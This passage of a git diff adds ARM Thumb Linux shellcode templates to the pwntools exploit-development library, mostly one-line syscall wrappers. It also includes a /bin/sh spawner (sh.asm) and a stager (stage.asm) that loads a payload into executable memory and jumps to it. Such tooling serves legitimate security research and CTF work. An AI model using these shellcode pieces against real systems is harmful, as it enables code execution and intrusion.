cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_getparam.asm new file mode 100644 index 000000000..375106e32 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_getscheduler.asm new file mode 100644 index 000000000..bb4c28d06 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..f01fc89b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_setaffinity.asm new file mode 100644 index 000000000..427c68081 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_setparam.asm new file mode 100644 index 000000000..8b2d93a87 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_setscheduler.asm new file mode 100644 index 000000000..ae596fe22 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sched_yield.asm b/pwnlib/shellcraft/templates/thumb/linux/sched_yield.asm new file mode 100644 index 000000000..3503e9173 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/select.asm b/pwnlib/shellcraft/templates/thumb/linux/select.asm new file mode 100644 index 000000000..09ab749bb --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sendfile.asm b/pwnlib/shellcraft/templates/thumb/linux/sendfile.asm new file mode 100644 index 000000000..4aaa97cb4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sendfile64.asm b/pwnlib/shellcraft/templates/thumb/linux/sendfile64.asm new file mode 100644 index 000000000..273e58739 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setdomainname.asm b/pwnlib/shellcraft/templates/thumb/linux/setdomainname.asm new file mode 100644 index 000000000..861068c01 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setgid.asm b/pwnlib/shellcraft/templates/thumb/linux/setgid.asm new file mode 100644 index 000000000..6618fc6cc --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setgroups.asm b/pwnlib/shellcraft/templates/thumb/linux/setgroups.asm new file mode 100644 index 000000000..0c85fa71f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sethostname.asm b/pwnlib/shellcraft/templates/thumb/linux/sethostname.asm new file mode 100644 index 000000000..6effc6961 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setitimer.asm b/pwnlib/shellcraft/templates/thumb/linux/setitimer.asm new file mode 100644 index 000000000..8ac1ac4d1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setpgid.asm b/pwnlib/shellcraft/templates/thumb/linux/setpgid.asm new file mode 100644 index 000000000..1a973ec42 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setpriority.asm b/pwnlib/shellcraft/templates/thumb/linux/setpriority.asm new file mode 100644 index 000000000..acab5628d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setregid.asm b/pwnlib/shellcraft/templates/thumb/linux/setregid.asm new file mode 100644 index 000000000..f169a7b67 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setregid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setresgid.asm b/pwnlib/shellcraft/templates/thumb/linux/setresgid.asm new file mode 100644 index 000000000..4e9fd0090 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setresuid.asm b/pwnlib/shellcraft/templates/thumb/linux/setresuid.asm new file mode 100644 index 000000000..6cc964e17 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setreuid.asm b/pwnlib/shellcraft/templates/thumb/linux/setreuid.asm new file mode 100644 index 000000000..58a3e16e1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setrlimit.asm b/pwnlib/shellcraft/templates/thumb/linux/setrlimit.asm new file mode 100644 index 000000000..949c2eff7 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setsid.asm b/pwnlib/shellcraft/templates/thumb/linux/setsid.asm new file mode 100644 index 000000000..7deec8f54 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/settimeofday.asm b/pwnlib/shellcraft/templates/thumb/linux/settimeofday.asm new file mode 100644 index 000000000..5e0ab5a34 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/setuid.asm b/pwnlib/shellcraft/templates/thumb/linux/setuid.asm new file mode 100644 index 000000000..2dfd2668c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sh.asm b/pwnlib/shellcraft/templates/thumb/linux/sh.asm index 5096562b1..ea9527286 100644 --- a/pwnlib/shellcraft/templates/thumb/linux/sh.asm +++ b/pwnlib/shellcraft/templates/thumb/linux/sh.asm @@ -1,12 +1,11 @@ -<% from pwnlib.shellcraft.thumb import mov %> -<%docstring>Execute /bin/sh +<% from pwnlib.shellcraft import thumb %> +<%docstring> +Execute a different process. - adr r0, execve_addr - ${mov('r2', 0)} - ${mov('r7', 'SYS_execve')} - push {r0, r2} - mov r1, sp - svc 1 - .balign 4, 1 -execve_addr: - .ascii "/bin/sh" + >>> p = run_assembly(shellcraft.thumb.linux.sh()) + >>> p.sendline('echo Hello') + >>> p.recv() + 'Hello\n' + + +${thumb.linux.execve('/bin///sh', 0, 0)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigaction.asm b/pwnlib/shellcraft/templates/thumb/linux/sigaction.asm new file mode 100644 index 000000000..4df3c81c0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/thumb/linux/sigaltstack.asm new file mode 100644 index 000000000..89f422b13 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/signal.asm b/pwnlib/shellcraft/templates/thumb/linux/signal.asm new file mode 100644 index 000000000..b46680c0b --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigpending.asm b/pwnlib/shellcraft/templates/thumb/linux/sigpending.asm new file mode 100644 index 000000000..106213ff5 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/thumb/linux/sigprocmask.asm new file mode 100644 index 000000000..4f28c6fff --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigprocmask.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigreturn.asm b/pwnlib/shellcraft/templates/thumb/linux/sigreturn.asm new file mode 100644 index 000000000..c29fd5f3c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigreturn.asm @@ -0,0 +1,10 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="scp"/> +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + + + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/thumb/linux/sigsuspend.asm new file mode 100644 index 000000000..420a7bfd9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/splice.asm b/pwnlib/shellcraft/templates/thumb/linux/splice.asm new file mode 100644 index 000000000..d5445be7e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/stage.asm b/pwnlib/shellcraft/templates/thumb/linux/stage.asm new file mode 100644 index 000000000..446a9526a --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stage.asm @@ -0,0 +1,62 @@ +<% +from pwnlib.shellcraft.thumb import push +from pwnlib.shellcraft.thumb.linux import read, readn, mmap +from pwnlib import constants as C +%> +<%page args="fd=0, length=None"/> +<%docstring> +Migrates shellcode to a new buffer. + +Arguments: + fd(int): + Integer file descriptor to recv data from. + Default is stdin (0). + length(int): + Optional buffer length. If None, the first pointer-width + of data received is the length. + +Example: + + >>> p = run_assembly(shellcraft.stage()) + >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) + >>> p.pack(len(sc)) + >>> p.send(sc) + >>> p.recvline() + 'Hello\n' + +<% + protection = C.PROT_READ | C.PROT_WRITE | C.PROT_EXEC + flags = C.MAP_ANONYMOUS | C.MAP_PRIVATE + + assert isinstance(fd, int) +%> +%if length is None: + /* How many bytes should we receive? */ + ${read(fd, 'sp', 4)} + pop {r2} + push {r2} /* Save exact size */ +%else: + ${push(length)} +%endif + + /* Page-align, assume <4GB */ + lsr r2, #12 + add r2, r2, #1 + lsl r2, #12 + + /* Map it */ + ${mmap(0, 'r2', protection, flags, 0, 0)} + + /* Grab the saved size, save the address */ + pop {r3} + + /* We need to jump to thumb code, so it must be odd */ + push {r0} + + /* Read in all of the data */ + ${readn(fd, 'r0', 'r3')} + + /* Go to shellcode */ + pop {r2} + add r2, r2, #1 + bx r2 diff --git a/pwnlib/shellcraft/templates/thumb/linux/stat.asm b/pwnlib/shellcraft/templates/thumb/linux/stat.asm new file mode 100644 index 000000000..e76e6bc2c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/stat64.asm b/pwnlib/shellcraft/templates/thumb/linux/stat64.asm new file mode 100644 index 000000000..14bdb6def --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/stime.asm b/pwnlib/shellcraft/templates/thumb/linux/stime.asm new file mode 100644 index 000000000..e7aee2f68 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/stty.asm b/pwnlib/shellcraft/templates/thumb/linux/stty.asm new file mode 100644 index 000000000..66c1c0a06 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/symlink.asm b/pwnlib/shellcraft/templates/thumb/linux/symlink.asm new file mode 100644 index 000000000..0067805b9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/symlinkat.asm b/pwnlib/shellcraft/templates/thumb/linux/symlinkat.asm new file mode 100644 index 000000000..52cec7c72 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sync.asm b/pwnlib/shellcraft/templates/thumb/linux/sync.asm new file mode 100644 index 000000000..e7fdefb95 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/thumb/linux/sync_file_range.asm new file mode 100644 index 000000000..423e5838e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/syscall.asm b/pwnlib/shellcraft/templates/thumb/linux/syscall.asm index 3dd927616..2b0d6a501 100644 --- a/pwnlib/shellcraft/templates/thumb/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/thumb/linux/syscall.asm @@ -1,9 +1,8 @@ <% from pwnlib.shellcraft import thumb - from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context + from pwnlib.constants import eval + from pwnlib.abi import linux_arm_syscall as abi %> - - <%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None, arg6 = None"/> <%docstring> Args: [syscall_number, \*args] @@ -19,13 +18,13 @@ Example: mov r1, sp mov r2, #2 eor r3, r3 - mov r7, #11 - swi #0 + mov r7, #0xb + svc 0x41 >>> print shellcraft.thumb.linux.syscall('SYS_exit', 0).rstrip() /* call exit(0) */ eor r0, r0 - mov r7, #(SYS_exit) - swi #0 + mov r7, #(SYS_exit) /* 1 */ + svc 0x41 <% if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): @@ -46,11 +45,13 @@ Example: while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) %>\ /* call ${syscall_repr} */ -% for dst, src in zip(['r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6', 'r7'], [arg0, arg1, arg2, arg3, arg4, arg5, arg6, syscall]): - % if src != None: - ${thumb.mov(dst, src)} - % endif -% endfor - swi #0 +%if any(arguments): + ${thumb.setregs(regctx)} +%endif + svc 0x41 diff --git a/pwnlib/shellcraft/templates/thumb/linux/syslog.asm b/pwnlib/shellcraft/templates/thumb/linux/syslog.asm new file mode 100644 index 000000000..578d83e04 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/tee.asm b/pwnlib/shellcraft/templates/thumb/linux/tee.asm new file mode 100644 index 000000000..d77ee9345 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/time.asm b/pwnlib/shellcraft/templates/thumb/linux/time.asm new file mode 100644 index 000000000..a54110cde --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_create.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_create.asm new file mode 100644 index 000000000..73ce44d34 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_delete.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_delete.asm new file mode 100644 index 